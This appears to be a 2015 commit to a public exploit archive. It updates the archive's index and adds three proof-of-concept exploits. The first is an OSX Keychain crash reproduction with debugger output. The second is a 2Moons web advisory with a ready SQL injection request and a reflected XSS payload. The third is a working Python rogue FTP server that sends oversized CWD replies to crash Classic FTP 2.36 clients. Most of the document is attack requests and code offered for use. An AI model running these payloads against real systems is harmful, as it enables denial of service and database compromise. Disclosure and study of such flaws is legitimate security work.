DB: 2015-08-10

3 new exploits
2015-08-10 05:01:54 +00:00 · 2015-08-10 05:01:54 +00:00 · b6cfc9b565
commit b6cfc9b565
parent 648b463161
4 changed files with 215 additions and 2 deletions
--- a/files.csv
+++ b/files.csv
@ -34039,7 +34039,9 @@ id,file,description,date,author,platform,type,port
 37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
 37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
 37710,platforms/linux/local/37710.txt,"Sudo <=1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
+37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0
 37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
+37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80
 37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
 37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
 37716,platforms/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",windows,local,0
@ -34048,7 +34050,7 @@ id,file,description,date,author,platform,type,port
 37719,platforms/windows/dos/37719.py,"Acunetix Web Vulnerability Scanner 9.5 - Crash PoC",2015-07-31,"Hadi Zomorodi Monavar",windows,dos,0
 37720,platforms/hardware/webapps/37720.py,"NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure",2015-07-31,St0rn,hardware,webapps,0
 37721,platforms/multiple/dos/37721.c,"BIND9 - TKEY PoC",2015-08-01,"Errata Security",multiple,dos,0
-37722,platforms/linux/local/37722.c,"Linux Privilege Escalation Due to Nested NMIs Interrupting espfix64",2015-08-05,"Andrew Lutomirski",linux,local,0
+37722,platforms/linux/local/37722.c,"Linux espfix64 - Privilege Escalation (Nested NMIs Interrupting)",2015-08-05,"Andrew Lutomirski",linux,local,0
 37723,platforms/multiple/dos/37723.py,"ISC BIND9 TKEY Remote DoS PoC",2015-08-05,elceef,multiple,dos,0
 37724,platforms/linux/local/37724.asm,"Linux x86 Memory Sinkhole Privilege Escalation PoC",2015-08-07,"Christopher Domas",linux,local,0
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
@ -34057,9 +34059,10 @@ id,file,description,date,author,platform,type,port
 37729,platforms/windows/remote/37729.py,"Filezilla Client 2.2.X - SEH Buffer Overflow Exploit",2015-08-07,ly0n,windows,remote,0
 37730,platforms/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow",2015-08-07,"Saeid Atabaki",windows,local,0
 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21
-37732,platforms/win32/local/37732.c,"Windows NDProxy Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
+37732,platforms/win32/local/37732.c,"Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002)",2015-08-07,"Tomislav Paskalev",win32,local,0
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Stored XSS And CSRF Add Admin Exploit",2015-08-07,LiquidWorm,php,webapps,80
 37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent XSS",2015-08-07,"Owais Mehtab",php,webapps,80
 37739,platforms/windows/dos/37739.py,"Dell Netvault Backup 10.0.1.24 - Denial of Service",2015-08-07,"Josep Pi Rodriguez",windows,dos,20031
+37741,platforms/osx/dos/37741.txt,"OSX Keychain - EXC_BAD_ACCESS DoS",2015-08-08,"Juan Sacco",osx,dos,0
 37743,platforms/linux/dos/37743.pl,"Brasero - Crash Proof Of Concept",2015-08-08,"Mohammad Reza Espargham",linux,dos,0
--- a/platforms/osx/dos/37741.txt
+++ b/platforms/osx/dos/37741.txt
@ -0,0 +1,87 @@
+# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
+# Date: 22/07/2015
+# Exploit Author: Juan Sacco
+# Vendor Homepage: https://www.apple.com
+# Software Link: https://www.apple.com/en/downloads/
+# Version: 9.0 (55161)
+# Tested on: OSX Yosemite 10.10.4
+# CVE : None
+
+# History - Reported to product-security@apple.com 20 Jul 2015
+# Be careful: Crashing the Keychain will affect the user ability to use
+Keychain stored passwords.
+
+# How to reproduce it manually
+1. Select a certificate, right click "New certificate preference.."
+2. Under "Location or Email address:" add random values +9000
+3. Click on Add to conduct the PoC manually
+
+# Technically:
+Performing @selector(addCertificatePreference:) from sender NSButton
+0x608000148cf0
+
+# Exception type
+Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
+Exception Codes:       KERN_PROTECTION_FAILURE at 0x00007fff4d866828
+External Modification Warnings:
+VM Regions Near 0x7fff4d866828:
+    MALLOC_SMALL           00007f9e7d000000-00007f9e80000000 [ 48.0M]
+rw-/rwx SM=PRV
+--> STACK GUARD            00007fff4c7de000-00007fff4ffde000 [ 56.0M]
+---/rwx SM=NUL  stack guard for thread 0
+    Stack                  00007fff4ffde000-00007fff507de000 [ 8192K]
+rw-/rwx SM=COW  thread 0
+
+(lldb)
+Process 490 resuming
+Process 490 stopped
+
+* thread #1: tid = 0x19b7, 0x00007fff92c663c3
+Security`SecCertificateSetPreference + 325, queue =
+'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2,
+address=0x7fff4d866828)
+
+    frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325
+
+Security`SecCertificateSetPreference:
+
+->  0x7fff92c663c3 <+325>: callq  0x7fff92cf18b2            ; symbol stub
+for: CFStringGetCString
+    0x7fff92c663c8 <+330>: movq   %rbx, -0x670(%rbp)
+    0x7fff92c663cf <+337>: testb  %al, %al
+    0x7fff92c663d1 <+339>: jne    0x7fff92c663d8            ; <+346>
+
+Process:               Keychain Access [598]
+Path:                  /Applications/Utilities/Keychain
+Access.app/Contents/MacOS/Keychain Access
+Identifier:            com.apple.keychainaccess
+Version:               9.0 (55161)
+Build Info:            KeychainAccess-55161000000000000~620
+Code Type:             X86-64 (Native)
+Parent Process:        ??? [1]
+Responsible:           Keychain Access [598]
+User ID:               501
+
+Date/Time:             2015-07-28 13:32:05.183 +0200
+OS Version:            Mac OS X 10.10.4 (14E46)
+Report Version:        11
+Anonymous UUID:        08523B58-1EF8-DC4A-A7D7-CB31074E4395
+Crashed Thread:        0  Dispatch queue: com.apple.main-thread
+
+VM Regions Near 0x7fff507776c8:
+    MALLOC_SMALL           00007ff93c800000-00007ff93e000000 [ 24.0M]
+rw-/rwx SM=PRV
+--> STACK GUARD            00007fff4e5d7000-00007fff51dd7000 [ 56.0M]
+---/rwx SM=NUL  stack guard for thread 0
+    Stack                  00007fff51dd7000-00007fff525d7000 [ 8192K]
+rw-/rwx SM=COW  thread 0
+
+  rax: 0x0000000001e5e1a0  rbx: 0x0000000000000006  rcx: 0x0000000008000100
+ rdx: 0x0000000001e5e1a0
+  rdi: 0x000060000045b6c0  rsi: 0x00007fff507776d0  rbp: 0x00007fff525d5f30
+ rsp: 0x00007fff507776d0
+   r8: 0x0000000000000000   r9: 0x00007fff79e6a300  r10: 0x00007ff93c019790
+ r11: 0x00007fff79147658
+  r12: 0x000000000000002d  r13: 0x00007fff507776d0  r14: 0x00007fff525d5880
+ r15: 0x00007ff93ae41680
+  rip: 0x00007fff901083c3  rfl: 0x0000000000010202  cr2: 0x00007fff507776c8
--- a/platforms/php/webapps/37713.txt
+++ b/platforms/php/webapps/37713.txt
@ -0,0 +1,75 @@
+# Title: 2Moons - Multiple Vulnerabilities
+# Date: 08-07-2015
+# Author: bRpsd (skype: vegnox)
+# Vendor: 2Moons
+# Vendor HomePage: http://2moons.cc/
+# CMS Download: https://github.com/jkroepke/2Moons
+# Google Dork: intext:Powered by 2Moons 2009-2013
+# Affected Versions: All Current Versions.
+
+-----------------------------------------------------------------------------------------------------------------------------------------------
+#1 SQL Injection:
+Page: index.php?action=register
+Parameter: externalAuth[method]
+
+## Proof Of Concept ##
+
+HTTP REQUEST:
+
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pentest/scripts/2Moons-master/index.php?page=register
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 146
+mode=send&externalAuth%5Baccount%5D=0&externalAuth%5Bmethod%5D=1'&referralID=0&uni=1&username=&password=&passwordReplay=&email=&emailReplay=&lang=en
+
+
+
+RESPONSE (200):
+MySQL Error :
+INSERT INTO uni1_users_valid SET `userName` = 'ttttttttt0', `validationKey` = '3126764a7b1875fc95c59ab0e4524818', `password` = '$2a$09$YdlOfJ0DB67Xc4IUuR9yi.ocwBEhJJItwRGqVWzFgbjSTAS.YiAyG', `email` = 'DDDDDDDDD@cc.com', `date` = '1437990463', `ip` = '::1', `language` = 'en', `universe` = 1, `referralID` = 0, `externalAuthUID` = '0', `externalAuthMethod` = '1'';
+
+
+
+-----------------------------------------------------------------------------------------------------------------------------------------------
+#2 Reflected Cross Site Scripting :
+
+HTTP REQUEST:
+
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pentest/scripts/2Moons-master/index.php?page=register
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 146
+mode=send&externalAuth%5Baccount%5D=0&externalAuth%5Bmethod%5D=1'"></><script>alert('test')</script>&referralID=0&uni=1&username=&password=&passwordReplay=&email=&emailReplay=&lang=en
+
+
+
+RESPONSE (200):
+MySQL Error :
+INSERT INTO uni1_users_valid SET `userName` = 'ttttttttt0', `validationKey` = '3126764a7b1875fc95c59ab0e4524818', `password` = '$2a$09$YdlOfJ0DB67Xc4IUuR9yi.ocwBEhJJItwRGqVWzFgbjSTAS.YiAyG', `email` = 'DDDDDDDDD@cc.com', `date` = '1437990463', `ip` = '::1', `language` = 'en', `universe` = 1, `referralID` = 0, `externalAuthUID` = '0', `externalAuthMethod` = '1'';(XSS HERE)
+
+
+-----------------------------------------------------------------------------------------------------------------------------------------------
+
+#3 Arbitrary File Download :
+Some Admins Forget To Delete This File Which Includes DB Information.
+http://localhost/2Moons-master.zip
+
+
+
+
+## Solutions ## :
+** Dont keep any installation files, erase them ** 
+** Remove the externalAuthMethod Permanently **
+** No solution yet from vendor **
+//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\
+//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\//\\ 		 	   		  
--- a/platforms/windows/dos/37711.py
+++ b/platforms/windows/dos/37711.py
@ -0,0 +1,48 @@
+#!/usr/bin/env python
+#
+# Exploit Title: Classic FTP v2.36 CWD Reconnection DOS
+# Date: 27/07/2015
+# Exploit Author: St0rn <fabien[at]anbu-pentest[dot]com>
+# Vendor Homepage: www.nchsoftware.com
+# Software Link: www.nchsoftware.com/classic/cftpsetup.exe
+# Version: 2.36
+# Tested on: Windows 7
+#
+
+
+import socket
+import sys
+import time
+
+
+junk1="250 "+"a"*(80000-6)+"\r\n"
+c=1
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.bind(("",21))
+s.listen(10)
+
+
+while 1:
+ conn, addr = s.accept()
+ print 'Connected with ' + addr[0] + ':' + str(addr[1])
+ conn.send("220 Classic FTP Xsploit\r\n")
+ try:
+  while 1:
+   buf=conn.recv(1024)
+   if "USER" in buf:
+    conn.send("331 User name okay, need password\r\n")
+   if "PASS" in buf:
+    conn.send("230-Password accepted.\r\n")
+    conn.send("230 User logged in.\r\n")
+   if "CWD" in buf:
+    conn.send(junk1)
+    print "Evil Response send with %s bytes!" %len(junk1)
+    print "Loop %s: \n\tWaiting client reconnection, crash in %s loop\n" %(c,(122-c))
+    if c==122:
+     print "BOOMmMm!"
+    c+=1
+   if "QUIT" in buf:
+    break
+ except:
+  time.sleep(0)